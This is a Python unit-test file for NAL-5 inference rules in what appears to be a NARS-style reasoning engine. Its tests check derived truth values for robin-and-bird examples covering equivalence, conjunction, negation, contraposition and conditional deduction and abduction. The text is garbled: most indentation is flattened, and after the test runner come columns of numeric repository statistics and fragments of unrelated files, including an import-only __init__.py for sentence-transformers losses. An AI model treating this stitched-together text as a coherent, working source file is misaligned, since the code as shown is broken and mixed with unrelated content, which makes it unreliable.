rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>. %1.00;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=())
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.80;0.65%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> bird>. %1.00;0.90%',
'<<robin --> [flying]> <=> <robin --> bird>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.80;0.65%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> <=> <robin --> bird>>. %0.80;0.90%',
'<robin --> bird>. %1.00;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=())
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.80;0.65%')
)
pass
def test_resemblance(self):
'''
'Detachment
'Robin is a type of animal if and only if robin is a type of bird.
<<robin --> animal> <=> <robin --> bird>>. %1.00;0.90%
'Robin is a type of bird if and only if robin can fly.
<<robin --> bird> <=> <robin --> [flying]>>. %0.90;0.90%
19
'Robin is a type of animal if and only if robin can fly.
''outputMustContain('<<robin --> [flying]> <=> <robin --> animal>>. %0.90;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> animal> <=> <robin --> bird>>. %1.00;0.90%',
'<<robin --> bird> <=> <robin --> [flying]>>. %0.90;0.90% ',
'<robin --> bird>.', index_task=(1,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> <=> <robin --> animal>>. %0.90;0.81%')
)
pass
def test_conversions_between_implication_and_equivalence(self):
'''
'conversions between Implication and Equivalence
'If robin can fly then robin is a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %0.90;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%
7
'Robin can fly if and only if robin is a type of bird.
''outputMustContain('<<robin --> [flying]> <=> <robin --> bird>>. %0.81;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> ==> <robin --> bird>>. %0.90;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%',
'<robin --> bird>.', index_task=(1,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> <=> <robin --> bird>>. %0.81;0.81%')
)
pass
def test_conjunction_0(self):
'''
'compound composition, two premises
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%
14
'If robin is a type of bird then usually robin is a type of animal and can fly.
''outputMustContain('<<robin --> bird> ==> (&&,<robin --> [flying]>,<robin --> animal>)>. %0.90;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> (&&,<robin --> [flying]>,<robin --> animal>)>. %0.90;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%',
'robin.', index_task=(0,0), index_belief=(0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> (&&,<robin --> [flying]>,<robin --> animal>)>. %0.90;0.81%')
)
pass
def test_conjunction_1(self):
'''
'compound composition, two premises
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin can fly then robin is a type of animal.
<<robin --> [flying]> ==> <robin --> animal>>. %0.90;0.90%
19
'If robin can fly and is a type of bird then robin is a type of animal.
''outputMustContain('<(&&,<robin --> [flying]>,<robin --> bird>) ==> <robin --> animal>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> animal>>. %0.90;0.90% ',
'<robin --> animal>.', index_task=(1,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [flying]>,<robin --> bird>) ==> <robin --> animal>>. %1.00;0.81%')
)
pass
def test_disjunction_0(self):
'''
'compound composition, two premises
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%
14
'If robin is a type of bird then robin is a type of animal or can fly.
''outputMustContain('<<robin --> bird> ==> (||,<robin --> [flying]>,<robin --> animal>)>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> (||,<robin --> [flying]>,<robin --> animal>)>. %1.00;0.81%')
)
pass
def test_disjunction_1(self):
'''
'compound composition, two premises
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin can fly then robin is a type of animal.
<<robin --> [flying]> ==> <robin --> animal>>. %0.90;0.90%
19
'If robin can fly or is a type of bird then robin is a type of animal.
''outputMustContain('<(||,<robin --> [flying]>,<robin --> bird>) ==> <robin --> animal>>. %0.90;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> animal>>. %0.90;0.90% ',
'<robin --> animal>.', index_task=(1,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(||,<robin --> [flying]>,<robin --> bird>) ==> <robin --> animal>>. %0.90;0.81%')
)
pass
def test_decomposition_0(self):
'''
'compound decomposition, two premises
'If robin is a type of bird then robin is not a type of flying animal.
<<robin --> bird> ==> (&&,<robin --> animal>,<robin --> [flying]>)>. %0.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %1.00;0.90%
8
'It is unlikely that if a robin is a type of bird then robin is a type of animal.
''outputMustContain('<<robin --> bird> ==> <robin --> animal>>. %0.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> (&&,<robin --> animal>,<robin --> [flying]>)>. %0.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %1.00;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> <robin --> animal>>. %0.00;0.81%')
)
pass
def test_decomposition_1(self):
'''
'compound decomposition, two premises
'Robin cannot be both a flyer and a swimmer.
(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90%
'Robin can fly.
<robin --> [flying]>. %1.00;0.90%
6
'Robin cannot swim.
''outputMustContain('<robin --> swimmer>. %0.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90% ',
'<robin --> [flying]>. %1.00;0.90%',
'robin.')
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90% ',
'<robin --> [flying]>. %1.00;0.90%',
'(&&,<robin --> [flying]>,<robin --> swimmer>).')
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90% ',
'robin.')
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90% ',
'<robin --> [flying]>.')
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.00;0.81%')
)
pass
def test_decomposition_2(self):
'''
'compound decomposition, two premises
'Robin can fly or swim.
(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.90%
'Robin cannot swim.
<robin --> swimmer>. %0.00;0.90%
2
'Robin can fly.
''outputMustContain('<robin --> [flying]>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.90% ',
'<robin --> swimmer>. %0.00;0.90%',
'robin.', index_task=(0,0), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %1.00;0.81%')
)
def test_composition_0(self):
'''
'compound decomposition, two premises
'Robin can fly.
<robin --> [flying]>. %1.00;0.90%
'Can robin fly or swim?
(||,<robin --> [flying]>,<robin --> swimmer>)?
7
''//+1 from original
'Robin can fly or swim.
''outputMustContain('(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'(||,<robin --> [flying]>,<robin --> swimmer>)?',
'<robin --> [flying]>.', is_belief_term=True, index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'(||,<robin --> [flying]>,<robin --> swimmer>)?',
'robin.', is_belief_term=True, index_task=(0,), index_belief=(0,0))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.81%')
)
def test_composition_1(self):
'''
'compound decomposition, two premises
'Robin can fly and swim.
$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%
1
'Robin can swim.
''outputMustContain('<robin --> swimmer>. %0.90;0.73%')
5
''//+2 from original
'Robin can fly.
''outputMustContain('<robin --> [flying]>. %0.90;0.73%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%',
'<robin --> swimmer>.',
'(&&,<robin --> swimmer>,<robin --> [flying]>).', is_belief_term=True, index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.90;0.73%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%',
'<robin --> [flying]>.',
'(&&,<robin --> swimmer>,<robin --> [flying]>).', is_belief_term=True, index_task=(), index_belief=(1,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.73%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%',
'<robin --> swimmer>.',
'robin.', is_belief_term=True, index_task=(0,0), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.90;0.73%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%',
'<robin --> [flying]>.',
'robin.', is_belief_term=True, index_task=(1,0), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.73%')
)
    def test_negation_0(self):
        '''
        'negation
        'It is unlikely that robin cannot fly.
        (--,<robin --> [flying]>). %0.10;0.90%
        3
        'Robin can fly.
        ''outputMustContain('<robin --> [flying]>. %0.90;0.90%')
        '''
        # NOTE(review): the docstring expects the positive judgement
        # '<robin --> [flying]>. %0.90;0.90%', but the first two sub-cases
        # below assert the negated form instead (same as test_negation_1) —
        # confirm whether both directions are intended here.
        # Case 1: positive judgement + negation question, matched on the
        # statement concept; derive the negation.
        rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
            '<robin --> [flying]>. %0.90;0.90%',
            '(--,<robin --> [flying]>)?',
            '<robin --> [flying]>.', is_belief_term=True, index_task=(), index_belief=(0,))
        tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
        self.assertTrue(
            output_contains(tasks_derived, '(--,<robin --> [flying]>). %0.10;0.90%')
        )
        # Case 2: same premises, matched on the inner term concept 'robin'.
        rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
            '<robin --> [flying]>. %0.90;0.90%',
            '(--,<robin --> [flying]>)?',
            'robin.', is_belief_term=True, index_task=(0,), index_belief=(0,0))
        tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
        self.assertTrue(
            output_contains(tasks_derived, '(--,<robin --> [flying]>). %0.10;0.90%')
        )
        # Case 3: negated judgement as the task; derive the positive form
        # (frequency flips 0.10 -> 0.90), matched on 'robin'.
        rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
            '(--,<robin --> [flying]>). %0.10;0.90%',
            '<robin --> [flying]>.',
            'robin.', is_belief_term=True, index_task=(0,0), index_belief=(0,))
        tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
        self.assertTrue(
            output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.90%')
        )
        # Case 4: negated judgement, belief term 'robin', matched on the
        # negation concept itself.
        rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
            '(--,<robin --> [flying]>). %0.10;0.90%',
            'robin.',
            '(--,<robin --> [flying]>).', is_belief_term=True, index_task=(), index_belief=(0,0))
        tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
        self.assertTrue(
            output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.90%')
        )
        # Case 5: negated judgement with the inner statement as belief term,
        # matched on the negation concept.
        rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
            '(--,<robin --> [flying]>). %0.10;0.90%',
            '<robin --> [flying]>.',
            '(--,<robin --> [flying]>).', is_belief_term=True, index_task=(), index_belief=(0,))
        tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
        self.assertTrue(
            output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.90%')
        )
def test_negation_1(self):
'''
'negation
'Robin can fly.
<robin --> [flying]>. %0.90;0.90%
'Can robin fly or not?
(--,<robin --> [flying]>)?
''//15
30
'It is unlikely that robin cannot fly.
''outputMustContain('(--,<robin --> [flying]>). %0.10;0.90%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %0.90;0.90%',
'(--,<robin --> [flying]>)?',
'<robin --> [flying]>.', is_belief_term=True, index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '(--,<robin --> [flying]>). %0.10;0.90%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %0.90;0.90%',
'(--,<robin --> [flying]>)?',
'robin.', is_belief_term=True, index_task=(0,), index_belief=(0,0))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '(--,<robin --> [flying]>). %0.10;0.90%')
)
def test_contraposition_0(self):
'''
'contraposition
'It is unlikely that if robin is not a type of bird then robin can fly.
<(--,<robin --> bird>) ==> <robin --> [flying]>>. %0.10;0.90%
'If robin cannot fly then is robin a type of bird?
<(--,<robin --> [flying]>) ==> <robin --> bird>>?
29
'I guess it is unlikely that if robin cannot fly then robin is a type of bird.
''outputMustContain('<(--,<robin --> [flying]>) ==> <robin --> bird>>. %0.00;0.45%')
561
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(--,<robin --> bird>) ==> <robin --> [flying]>>. %0.10;0.90%',
'<robin --> bird>.',
'(--,<robin --> bird>).', is_belief_term=True, index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(--,<robin --> [flying]>) ==> <robin --> bird>>. %0.00;0.45%')
)
pass
# rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
# '<(--,<robin --> bird>) ==> <robin --> [flying]>>. %0.10;0.90%',
# '<(--,<robin --> [flying]>) ==> <robin --> bird>>?',
# '<robin --> [flying]>.', is_belief_term=True, index_task=(1,), index_belief=(0,0))
# tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
# self.assertTrue(
# output_contains(tasks_derived, '<(--,<robin --> [flying]>) ==> <robin --> bird>>. %0.00;0.45%')
# )
# pass
def test_conditional_deduction_compound_eliminate_0(self):
'''
'conditional deduction
'If robin can fly and has wings then robin is a bird.
<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%
'robin can fly.
<robin --> [flying]>. %1.00;0.90%
1
'If robin has wings then robin is a bird
''outputMustContain('<<robin --> [with_wings]> ==> <robin --> bird>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%',
'<robin --> [flying]>. %1.00;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [with_wings]> ==> <robin --> bird>>. %1.00;0.81%')
)
pass
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%',
'robin.', index_task=(0,), index_belief=(0,0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [with_wings]> ==> <robin --> bird>>. %1.00;0.81%')
)
pass
def test_conditional_deduction_compound_eliminate_1(self):
'''
'conditional deduction
'If robin can fly, has wings, and chirps, then robin is a bird
<(&&,<robin --> [chirping]>,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%
'robin can fly.
<robin --> [flying]>. %1.00;0.90%
5
'If robin has wings and chirps then robin is a bird.
''outputMustContain('<(&&,<robin --> [chirping]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> [chirping]>,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.90%',
'<robin --> [flying]>. %1.00;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [chirping]>,<robin --> [with_wings]>) ==> <robin --> bird>>. %1.00;0.81%')
)
pass
def test_conditional_deduction_compound_replace_0(self):
'''
'conditional deduction
'If robin is a bird and it's living, then robin is an animal
<(&&,<robin --> bird>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.90%
'If robin can fly, then robin is a bird
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%
1
'If robin is living and it can fly, then robin is an animal.
''outputMustContain('<(&&,<robin --> [flying]>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> bird>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90% ',
'robin.', index_task=(0,0,0), index_belief=(0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [flying]>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90% ',
'<(&&,<robin --> bird>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.90%',
'robin.', index_task=(0,0), index_belief=(0,0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [flying]>,<robin --> [living]>) ==> <robin --> animal>>. %1.00;0.81%')
)
pass
def test_conditional_abduction_compound_replace_1(self):
'''
'conditional abduction
'If robin can fly then robin is a bird.
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%
'If robin both swims and flys then robin is a bird.
<(&&,<robin --> swimmer>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%
7
'I guess robin swims.
''outputMustContain('<robin --> swimmer>. %1.00;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> swimmer>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %1.00;0.45%')
)
pass
def test_conditional_abduction_compound_replace_2(self):
'''
'conditional abduction
'If robin can fly and it has wings, then robin is living.
<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> [living]>>. %0.90;0.90%
'If robin can fly and robin is a bird then robin is living.
<(&&,<robin --> [flying]>,<robin --> bird>) ==> <robin --> [living]>>. %1.00;0.90%
18
'I guess if robin is a bird, then robin has wings.
''outputMustContain('<<robin --> bird> ==> <robin --> [with_wings]>>. %1.00;0.42%')
'I guess if robin has wings, then robin is a bird.
''outputMustContain('<<robin --> [with_wings]> ==> <robin --> bird>>. %0.90;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> [flying]>,<robin --> [with_wings]>) ==> <robin --> [living]>>. %0.90;0.90%',
'<(&&,<robin --> [flying]>,<robin --> bird>) ==> <robin --> [living]>>. %1.00;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> <robin --> [with_wings]>>. %1.00;0.42%')
)
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [with_wings]> ==> <robin --> bird>>. %0.90;0.45%')
)
pass
def test_conditional_induction_compose(self):
'''
'conditional induction
'If robin can fly and robin chirps, then robin is a bird
<(&&,<robin --> [chirping]>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%
'If robin can fly then usually robin has a beak.
<<robin --> [flying]> ==> <robin --> [with_beak]>>. %0.90;0.90%
18
'I guess that if robin chirps and robin has a beak, then robin is a bird.
''outputMustContain('<(&&,<robin --> [chirping]>,<robin --> [with_beak]>) ==> <robin --> bird>>. %1.00;0.42%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<(&&,<robin --> [chirping]>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> [with_beak]>>. %0.90;0.90%',
'robin.', index_task=(0,0,0), index_belief=(0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [chirping]>,<robin --> [with_beak]>) ==> <robin --> bird>>. %1.00;0.42%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> ==> <robin --> [with_beak]>>. %0.90;0.90%',
'<(&&,<robin --> [chirping]>,<robin --> [flying]>) ==> <robin --> bird>>. %1.00;0.90%',
'robin.', index_task=(0,0), index_belief=(0,0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [chirping]>,<robin --> [with_beak]>) ==> <robin --> bird>>. %1.00;0.42%')
)
pass
if __name__ == '__main__':
    # Collect the suites for every listed test class and run them once.
    loader = unittest.TestLoader()
    suites = unittest.TestSuite(
        [loader.loadTestsFromTestCase(cls) for cls in (TEST_NAL5,)])
    runner = unittest.TextTestRunner()
    results = runner.run(suites)
| 42.45
| 134
| 0.532347
| 5,567
| 44,997
| 4.164721
| 0.031435
| 0.026914
| 0.020013
| 0.07039
| 0.934829
| 0.916929
| 0.896571
| 0.867457
| 0.84559
| 0.826094
| 0
| 0.052797
| 0.27264
| 44,997
| 1,059
| 135
| 42.490085
| 0.655596
| 0.276307
| 0
| 0.662626
| 0
| 0.137374
| 0.285096
| 0
| 0
| 0
| 0
| 0
| 0.105051
| 1
| 0.062626
| false
| 0.054545
| 0.022222
| 0
| 0.086869
| 0.00202
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
6726199fe8a0b57e376df060c4cbd8035df7ee08
| 409
|
py
|
Python
|
sentence_transformers_extensions/losses/__init__.py
|
t-mesq/sentence-transformers
|
5dbf13ce986e4d0938479a97e76077d396f47277
|
[
"Apache-2.0"
] | null | null | null |
sentence_transformers_extensions/losses/__init__.py
|
t-mesq/sentence-transformers
|
5dbf13ce986e4d0938479a97e76077d396f47277
|
[
"Apache-2.0"
] | null | null | null |
sentence_transformers_extensions/losses/__init__.py
|
t-mesq/sentence-transformers
|
5dbf13ce986e4d0938479a97e76077d396f47277
|
[
"Apache-2.0"
] | null | null | null |
from .ModularLosses import *
from .MultiplePositivesAndNegativesRankingLoss import *
# from .MeanAveragePrecisionLoss import *
# from .NormalizedDiscountedCumulativeGainLoss import *
# from .NLLAndMAPLoss import *
# from .NLLAndNDCGLoss import *
from .TransposedMultiplePositivesAndNegativesRankingLoss import *
from .BiMultiplePositivesAndNegativesRankingLoss import *
from .BatchAllCrossEntropyLoss import *
| 45.444444
| 65
| 0.850856
| 27
| 409
| 12.888889
| 0.407407
| 0.229885
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.095355
| 409
| 9
| 66
| 45.444444
| 0.940541
| 0.371638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
67506daafdcff21502f3a895350e711049d0ede5
| 36,200
|
py
|
Python
|
pvfactors/tests/test_irradiance/test_models.py
|
soreva/pvfactors
|
422f883fd6e68c38900ceb74977b3267555f3fee
|
[
"BSD-3-Clause"
] | 60
|
2018-06-20T03:28:06.000Z
|
2022-03-09T03:34:42.000Z
|
